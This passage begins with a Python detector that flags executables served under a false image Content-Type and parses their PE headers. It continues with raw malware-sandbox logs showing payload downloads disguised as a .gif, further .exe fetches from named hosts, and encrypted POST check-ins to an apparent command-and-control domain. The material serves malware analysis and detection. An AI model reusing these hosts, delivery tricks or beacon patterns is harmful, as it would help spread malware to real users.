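COFF header parse for anything that turns out to be an executable.

Added example, not code from the report. SAMPLE_RESPONSE is constructed from
the captured headers and leading bytes (Content-Type: image/gif, body
starting 4d 5a 90 00 ...); the DOS stub and Rich header between the DOS
header and the PE signature at 0xE8 are replaced by zero padding.
"""
import datetime as dt
import struct

SNIFF = [("pe", b"MZ"), ("gif", b"GIF87a"), ("gif", b"GIF89a"),
         ("png", b"\x89PNG\r\n\x1a\n"), ("pdf", b"%PDF-"), ("zip", b"PK\x03\x04")]
# Which sniffed kinds are acceptable for a declared media type; types not
# listed here are not judged (a generic server may send anything).
ACCEPTS = {"image/gif": {"gif"}, "image/png": {"png"}, "application/pdf": {"pdf"},
           "application/zip": {"zip"}, "application/x-msdos-program": {"pe"},
           "application/x-msdownload": {"pe"},
           "application/octet-stream": {"pe", "zip", "pdf", "unknown"}}
IMAGE_FILE_MACHINE = {0x14C: "i386", 0x8664: "amd64", 0x1C0: "arm", 0xAA64: "arm64"}


def sniff(body):
    for kind, magic in SNIFF:
        if body.startswith(magic):
            return kind
    return "unknown"


def parse_pe_coff(body):
    """DOS header -> e_lfanew -> 'PE\\0\\0' -> COFF header + optional magic."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", body, 0x3C)
    if e_lfanew + 26 > len(body) or body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsect, stamp, _symptr, _nsyms, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", body, e_lfanew + 4)
    (opt_magic,) = struct.unpack_from("<H", body, e_lfanew + 24)
    return {"machine": machine,
            "machine_name": IMAGE_FILE_MACHINE.get(machine, hex(machine)),
            "sections": nsect, "timestamp": stamp,
            "compiled_utc": dt.datetime.fromtimestamp(stamp, dt.timezone.utc)
                            .strftime("%Y-%m-%dT%H:%M:%SZ"),
            "optional_header_size": opt_size, "optional_magic": opt_magic,
            "characteristics": chars, "pe32plus": opt_magic == 0x20B}


def check_response(raw):
    """Parse a raw HTTP/1.1 response and compare declared type with content."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        k, _, v = line.decode("latin-1").partition(":")
        headers[k.strip().lower()] = v.strip()
    declared = headers.get("content-type", "").split(";")[0].strip().lower()
    kind = sniff(body)
    result = {"declared": declared, "sniffed": kind,
              "mismatch": declared in ACCEPTS and kind not in ACCEPTS[declared],
              "declared_length": int(headers.get("content-length", "0") or 0),
              "bytes_seen": len(body)}
    if kind == "pe":
        result["pe"] = parse_pe_coff(body)
    return result


# --- constructed fixture from the captured response ---------------------------
DOS_HEADER = (bytes.fromhex("4d5a9000 03000000 04000000 ffff0000 "
                            "b8000000 00000000 40000000 00000000")
              + bytes(28) + struct.pack("<I", 0xE8))          # e_lfanew = 0xE8
PE_HEADER = bytes.fromhex("50450000 4c010400 45e5fc5d 00000000 00000000 e0000301 0b01")
SAMPLE_BODY = DOS_HEADER + bytes(0xE8 - len(DOS_HEADER)) + PE_HEADER
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                   b"Date: Thu, 15 Oct 2020 17:51:12 GMT\r\n"
                   b"Server: Apache\r\n"
                   b"Content-Length: 139776\r\n"
                   b"Content-Type: image/gif\r\n"
                   b"\r\n" + SAMPLE_BODY)

if __name__ == "__main__":
    print(check_response(SAMPLE_RESPONSE))
```

With the same table, the two later downloads in this report (application/x-msdos-program from ptc-latam.com and application/octet-stream from 91.92.128.201) are consistent with their MZ bodies, so only the .gif one is a header lie; the check is about the mismatch, not about PE downloads as such.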
Source: global traffic; TCP traffic: 192.168.2.7:49743 -> 142.4.7.183:4035
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 15 Oct 2020 17:51:12 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 15 Oct 2020 09:34:15 GMTETag: "32032e2-22200-5b1b259f3d3c0"Accept-Ranges: bytesContent-Length: 139776Keep-Alive: timeout=5Content-Type: image/gifData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7a 6a aa 6e 3e 0b c4 3d 3e 0b c4 3d 3e 0b c4 3d 20 59 51 3d 24 0b c4 3d 20 59 40 3d 15 0b c4 3d 20 59 47 3d 57 0b c4 3d 19 cd bf 3d 3b 0b c4 3d 3e 0b c5 3d b8 0b c4 3d 20 59 4e 3d 3f 0b c4 3d 20 59 56 3d 3f 0b c4 3d 20 59 50 3d 3f 0b c4 3d 20 59 55 3d 3f 0b c4 3d 52 69 63 68 3e 0b c4 3d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 45 e5 fc 5d 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 74 01 00 00 a0 4a 00 00 00 00 00 ac 2b 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 4c 00 00 04 00 00 ea cb 02 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 90 de 01 00 47 00 00 00 78 d3 01 00 3c 00 00 00 00 b0 4b 00 c8 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 42 73 01 00 00 10 00 00 00 74 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d7 4e 00 00 00 90 01 00 00 50 00 00 00 78 01 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 cf 49 00 00 e0 01 00 00 16 00 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c8 43 00 00 00 b0 4b 00 00 44 00 00 00 de 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-msdos-programContent-Length: 125440Connection: keep-aliveKeep-Alive: timeout=15Date: Thu, 15 Oct 2020 17:52:00 GMTServer: ApacheLast-Modified: Mon, 05 Oct 2020 12:04:35 GMTETag: "1ea00-5b0eb492c5ac0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7a 6a aa 6e 3e 0b c4 3d 3e 0b c4 3d 3e 0b c4 3d 20 59 51 3d 24 0b c4 3d 20 59 40 3d 15 0b c4 3d 20 59 47 3d 57 0b c4 3d 19 cd bf 3d 3b 0b c4 3d 3e 0b c5 3d b8 0b c4 3d 20 59 4e 3d 3f 0b c4 3d 20 59 56 3d 3f 0b c4 3d 20 59 50 3d 3f 0b c4 3d 20 59 55 3d 3f 0b c4 3d 52 69 63 68 3e 0b c4 3d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 02 af ad 5d 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 3c 01 00 00 9e 4a 00 00 00 00 00 ac 2b 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 4b 00 00 04 00 00 c6 55 02 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 90 9e 01 00 48 00 00 00 78 93 01 00 3c 00 00 00 00 70 4b 00 c8 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 01 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 22 3a 01 00 00 10 00 00 00 3c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d8 4e 00 00 00 50 01 00 00 50 00 00 00 40 01 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 cf 49 00 00 a0 01 00 00 16 00 00 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c8 43 00 00 00 70 4b 00 00 44 00 00 00 a6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 15 Oct 2020 17:52:02 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Last-Modified: Thu, 15 Oct 2020 17:50:38 GMTETag: "177440-5b1b9492d7609"Accept-Ranges: bytesContent-Length: 1537088Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 3a 88 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 02 01 00 0c 00 00 00 60 17 00 00 00 00 00 90 15 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 17 00 00 04 00 00 40 e9 17 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 22 00 00 3c 00 00 00 00 10 14 00 20 7f 03 00 00 00 00 00 00 00 00 00 00 70 17 00 40 04 00 00 00 90 17 00 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 22 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 0a 00 00 00 10 00 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 ac 04 00 00 00 20 00 00 00 06 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 3c d7 13 00 00 30 00 00 00 d8 13 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 7f 03 00 00 10 14 00 00 80 03 00 00 ee 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 
00 00 68 01 00 00 00 90 17 00 00 02 00 00 00 6e 17 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /15.gif HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: alamalidaa.com | Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sm15sdsd.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: sm15sdsd.xyzData Raw: c8 76 7c 5d 48 a3 bb a8 d5 13 80 3c b6 52 18 af 79 5e d2 6d dc d2 2f 13 cc 6c c3 9d ae 18 6d c4 2b 52 f6 5f ac 7f b8 5e 20 b9 1d e8 c0 5f d8 31 ea b1 43 f9 4b 18 89 60 c3 f3 c9 9b c0 8f 73 a9 19 6c 15 b6 ed 11 17 b0 e6 12 0f e2 a5 b2 f6 a8 c6 e5 c3 8f 12 b3 5d 8a 7a ef fd 6e 70 d5 89 61 be 85 9b 29 41 99 51 c0 6f c9 a2 c6 ad ae 8e 67 13 7c 44 98 7c 2a b4 08 72 2a 3a d1 ae a8 e2 9d 1a 92 3b 98 b8 ba bf 29 e9 e2 2e f6 31 4f 9d 0b 52 f9 c8 e8 ad 7a 9d 46 38 5d 86 c8 65 f0 41 37 15 b1 a2 f3 9b af 71 6b b7 9d 2e 22 8c Data Ascii: v|]H<Ry^m/lm+R_^ _1CK`sl]znpa)AQog|D|*r*:;).1ORzF8]eA7qk."
Source: global traffic; HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://sm15sdsd.xyz/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 140 |
 Host: sm15sdsd.xyz
Source: global traffic; HTTP traffic detected: GET /soc13.exe HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: ptc-latam.com
Source: global traffic; HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://sm15sdsd.xyz/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 238 | Host: sm15sdsd.xyz
Source: global traffic; HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://sm15sdsd.xyz/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 266 | Host: sm15sdsd.xyz
Source: global traffic; HTTP traffic detected: GET /kv.exe HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 91.92.128.201
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sm15sdsd.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: sm15sdsd.xyzData Raw: c8 76 7c 5d 48 a3 bb a8 d5 13 80 3c b6 52 18 af 79 5e d2 6d dc d2 2f 13 cc 6c c3 9d ae 18 6d c4 2b 52 f6 5f ac 7f b8 5e 20 b9 1d e8 c0 5f d8 31 ea b1 43 f9 4b 18 89 60 c3 f3 c9 9b c0 8f 73 a9 19 6c 15 b6 ef 11 16 b0 e6 12 0f e2 a5 b2 c1 f2 ea 8a b6 a1 31 a5 18 e0 0a a3 81 21 31 b5 d3 11 d7 ab e0 35 14 a3 76 a1 24 e0 a3 d6 f6 9f db 0a 12 65 32 9f 07 47 b2 02 38 49 24 ef f5 9e 82 9c 62 cc 73 82 c9 bf 8e 32 fe bd Data Ascii: v|]H<Ry^m/lm+R_^ _1CK`sl1!15v$e2G8I$bs2
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sm15sdsd.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 423Host: sm15sdsd.xyzData Raw: c8 76 7c 5d 48 a3 bb a8 d5 13 80 3c b6 52 18 af 79 5e d2 6d dc d2 2f 13 cc 6c c3 9d ae 18 6d c4 2b 52 f6 5f ac 7f b8 5e 20 b9 1d ac 85 0c 93 65 a5 e1 6e ce 7a 2e dd 57 f4 c2 c9 9b c0 8f 73 a9 19 cc 14 b6 e8 11 17 b0 e6 12 0e e2 a5 b2 88 c9 ef 8c c9 bd 1c d4 2a f1 6d c5 85 0c 53 a3 b1 69 dd b5 94 3f 49 8f 63 8d 7b c0 cc de c4 82 e9 15 09 15 2d ab 1d 29 f0 4f 57 2b 14 d5 a1 9f c6 9e 6e d3 76 eb cc 97 b8 26 ec c9 0b c9 41 66 e3 29 3b fc e7 f6 d7 43 80 74 4a 69 fc f8 6c c7 63 68 0b a6 ac d4 9d e5 4d 6f d1 b3 3c 35 d8 08 d5 d8 6f ae 96 d8 16 d8 9a 13 c1 d7 16 00 bd 3a d2 a3 61 a2 58 12 a5 bc 81 57 29 85 a5 c1 cf 2b 0f aa 31 eb ac 9c 74 5a d5 df 97 6d 61 aa 5d 23 72 23 ab c6 8b 5e 1b f0 c2 4c e9 67 04 a0 c6 0d 34 e8 bf 95 b0 ff 06 e6 03 1d a6 4d e6 f5 52 92 79 24 08 29 68 52 f6 81 df b2 c7 fb 88 f2 5a a2 82 1b b5 95 2e ab 56 53 db b7 39 54 92 2a da b7 3d 5f 93 08 29 1b fd 5b 5f b1 2e 4d 59 38 66 ef c7 06 e8 1f 86 82 96 fc 65 af fb 5c 51 f7 c3 15 6d 94 df 37 f1 65 49 7b 95 f8 fb 2f d4 2d b7 36 5b e7 67 3b 1f d3 ee 52 53 4c d7 11 00 94 90 b8 25 c4 a7 8d 74 b5 59 62 8d ad 91 bf 59 e6 a5 36 0f 17 08 54 d4 7e c4 bc 69 e8 55 6b b0 d0 e0 f1 d1 ea e9 06 ef ca bc e9 7d 7d c5 af 9b 2b 72 8c 37 84 98 b4 3f 79 21 bb 99 05 7e c7 fb da 8f 1d 52 f6 d2 f8 89 c2 e9 58 52 Data Ascii: v|]H<Ry^m/lm+R_^ enz.Ws*mSi?Ic{-)OW+nv&Af);CtJilchMo<5o:aXW)+1tZma]#r#^Lg4MRy$)hRZ.VS9T*=_)[_.MY8fe\Qm7eI{/-6[g;RSL%tYbY6T~iUk}}+r7?y!~RXR
Source: unknown | TCP traffic detected without corresponding DNS query: 91.92.128.201 (this row is repeated 50 times in the report, one per connection)
Source: C:\Users\user\AppData\Local\Temp\A185.exe | Code function: 18_2_00404A6A ioctlsocket,connect,connect,select,ioctlsocket,WSAIoctl,select,recv, 18_2_00404A6A
Source: global traffic | HTTP traffic detected:
    GET /15.gif HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: alamalidaa.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /soc13.exe HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: ptc-latam.com
Source: global traffic | HTTP traffic detected:
    GET /kv.exe HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: 91.92.128.201
Source: unknown | DNS traffic detected: queries for: alamalidaa.com
Source: unknown | HTTP traffic detected:
    POST / HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://sm15sdsd.xyz/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 173
    Host: sm15sdsd.xyz
    Data Raw: c8 76 7c 5d 48 a3 bb a8 d5 13 80 3c b6 52 18 af 79 5e d2 6d dc d2 2f 13 cc 6c c3 9d ae 18 6d c4 2b 52 f6 5f ac 7f b8 5e 20 b9 1d e8 c0 5f d8 31 ea b1 43 f9 4b 18 89 60 c3 f3 c9 9b c0 8f 73 a9 19 6c 15 b6 ed 11 17 b0 e6 12 0f e2 a5 b2 f6 a8 c6 e5 c3 8f 12 b3 5d 8a 7a ef fd 6e 70 d5 89 61 be 85 9b 29 41 99 51 c0 6f c9 a2 c6 ad ae 8e 67 13 7c 44 98 7c 2a b4 08 72 2a 3a d1 ae a8 e2 9d 1a 92 3b 98 b8 ba bf 29 e9 e2 2e f6 31 4f 9d 0b 52 f9 c8 e8 ad 7a 9d 46 38 5d 86 c8 65 f0 41 37 15 b1 a2 f3 9b af 71 6b b7 9d 2e 22 8c
    Data Ascii: v|]H<Ry^m/lm+R_^ _1CK`sl]znpa)AQog|D|*r*:;).1ORzF8]eA7qk."
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Thu, 15 Oct 2020 17:51:59 GMT
    Server: Apache/2.4.6 (CentOS) PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=windows-1251
    Data Raw: 36 64 64 36 35 0d 0a 18 00 00 00 58 bc 34 8a 0d 42 9e 49 6f af 1f fb e0 6d 9c 48 71 53 53 0e 4f 3a d4 35 00 48 dd 06 00 7a 2b 64 5f 0b 0f 07 00 0f 00 9e 03 00 00 18 82 5b 5f 7d 98 d9 47 7d 1a c3 22 18 00 41 00 73 25 7e 88 cb 3d 0f c3 2b ba 98 b6 8e 4d 8b 51 d5 7b 0a 1a 9e 31 b6 eb 2d be 9e ad 42 05 e0 0c 4a b8 5f 49 ad 59 fc fa 6a b3 62 4e 53 99 09 b8 78 6d 8b 77 f9 c8 05 b0 87 64 0a f2 85 50 41 54 24 17 a5 62 39 63 ea 81 c8 1d b9 1f 0b f8 1d 81 11 dc 3e e4 9f be 4d b3 17 93 83 4c 5d 78 98 b3 0a 23 ef 74 9e c5 70 38 4a 85 44 6c f8 61 5e 25 a9 34 a0 ef ba f7 b5 fb 44 f4 3f db 22 51 0a 08 4f ad 63 48 9f 37 7e 8a 65 a4 6b e3 00 27 ae 03 97 fc bd 8f 69 2f ba 1a ba 33 c4 33 c4 66 c2 68 bc 62 15 65 1c 45 76 a3 8c 9e ef f7 4a 76 2b 9f aa 4b e1 09 61 89 c2 b2 c4 01 3f d8 73 56 d1 0b 4f b7 aa 7a 2f e4 0c f7 ad c4 07 ee 30 c3 80 77 b2 28 93 82 a0 e2 d5 0c 36 30 97 f6 0e 61 d6 14 91 ee f8 92 d0 2b a9 27 4e 11 7b a9 ca 5a ce 88 a9 7f 8c 88 85 5b e5 91 d3 80 4f 1a 83 ec fc cd e7 4e 68 59 2a ee 04 d4 91 40 34 60 40 a6 40 08 19 61 b2 34 9e 69 14 08 4f 5c 1e ac a3 b9 94 35 ee a4 3c 83 4b 07 10 f7 9d 99 d3 73 d6 39 19 67 4e 1b 11 3a 35 ad a0 3b 56 e1 94 54 c3 a4 33 22 f6 bb b3 5b 61 1e d6 db 69 63 26 c9 7d 9a 81 9a 49 e8 86 1c 56 96 1a 48 52 4e 8d e5 d7 02 69 ea f2 89 b3 81 c0 71 b7 04 88 3d 81 a0 63 5e 87 81 c6 c3 7a 07 1e 17 60 a3 55 4d c1 99 e8 54 3f 32 8f f3 7a 05 91 8b 69 79 67 78 3d ea af 6f 2e 60 7d 81 8f 53 c0 e2 e1 20 ef 92 9d 51 e8 99 66 c3 17 fe be 49 bd 32 b2 e8 cb a1 04 12 9f b1 c0 85 ca 6c d8 11 06 b7 c9 02 71 2b 1e dc c0 5b 19 48 0f a4 f7 b8 fb c2 59 41 76 96 e7 59 5b 2a 49 04 0f f6 5e 56 c1 67 86 59 6f 63 b6 43 9a 88 67 3d 9f f7 eb 7c 66 03 24 e3 25 10 09 d5 ba 15 55 20 99 01 b4 e4 56 38 0e 0c 9a e6 ed f4 ae 23 d7 8e d1 00 dc d4 95 04 57 e3 f8 e6 f5 1a 63 34 6a b6 95 80 70 8b ad c5 52 50 4b 2f 80 87 bf b1 eb 4b d4 22 c3 24 eb e5 62 1f 92 4b 53 fc b7 2d 5a 30 18 69 cd d4 8a 4f f3 25 83 ce 75 30 30 2c 5c 54 15 ea ee 1d 3a 0b 63 5e e9 58 22 a0 69 b6 4c 28 ce 20 ad 94 85 a2 a0 e2 f8 ee 91 1b e5 56 6c b5 3a 16 